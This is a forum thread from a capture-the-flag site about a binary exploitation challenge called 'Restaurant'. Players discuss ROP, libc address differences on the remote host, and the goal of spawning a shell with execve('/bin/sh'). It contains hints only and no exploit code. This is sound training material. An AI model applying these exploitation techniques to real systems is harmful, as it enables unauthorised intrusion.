Official Restaurant Discussion

Official discussion thread for Restaurant. Please do not post any spoilers or big hints.

So…I’ve been on this one for a handful of hours and I’m getting the feeling I’ve misunderstood its “Easy” rating.

Is there a useful correlation between what the community rates and what I should expect to use in my own toolsets?

I ask because I’ve been writing my own codes against the binaries; at first just to see if I could get the flag out of the binaries themselves, but now I’m looking at whether the host server is involved (so I’m worrying about what might be randomized).

Am I making this too complicated, just about right or…?

Same consideration for me. I’ve decompiled the executable and I have seen the vulnerability, but I don’t know how capture the flag. Send a rev shellcode on the server maybe?

That’s what I was thinking, but knowing how compilers protect against certain mistakes (where the process suicides if testers go after them), I felt like I had left Easy…at least without using a tool. I guess I’ll try anyway / try not to trip any protections.

Did anyone manage this challenge? I need in a small hint.

Hum… not that easy :slight_smile: Is the goal is to inject a shellcode so access the server fs? I guess… I didn’t find that much useful information in the code itself and it looks some protections were applied. Is it a ROP challenge?

Could someone who has solved this challenge PM me? I need a nudge.

I was able to exploit this on my local machine. However, seems like l*bc address on the remote machine is different. Can you please give me a hint on how to discover the remote l*bc address? :smiley:

The aim of this, and typically all of the user land pwn challenges on HTB, is to make the remote process instance execute a shell (i.e. execve("/bin/sh", 0, 0);), which you will typically use to read the flag file from the filesystem. The filename of the flag is not always predictable, so don’t waste your time writing shellcode to just read the contents of a specific file. There is a separate thread specifically about pwn challenges at Pwn Challenges — Hack The Box :: Forums.

I’m happy to help anyone with a specific question about this challenge. But please tell me what you’ve done so far, where you’re stuck and what your current thoughts are.

Just did this challenge. I would only call this challenge easy, in the sense that it is fairly straightforward IF you already know the techniques to defeat the protections on the binary (unless there’s some glaring vuln that I missed :D). In my mind, the challenge is not “total beginner easy”.

DM me what you’ve tried and I’ll be happy to provide nudges.

Feel free to message me on discord:- “Alex Zander#0764” for any doubts.

Fun Challenge if you are careful and don’t make the stupid mistake I did. :slight_smile:

If, like me, you suck at pwn challenges, you’re in for a ride. It took me a bit less than a week of almost daily effort to crack that one. Maybe I didn’t do it the intended way, though, I can’t be sure. What I did seems very difficult to me but maybe I’m just the biggest noob of all times :smiley:
Anyway, understand your 64 bits architecture before jumping into this one, and, yes, it may work locally but not remotely. Google every error message you get and be patient.

That was very hard, but also very rewarding :slightly_smiling_face:

I was able to get the shell locally. However, remotely it will be a segfault. Naturally, the various addresses have been changed for remote use.
What is the logic behind this?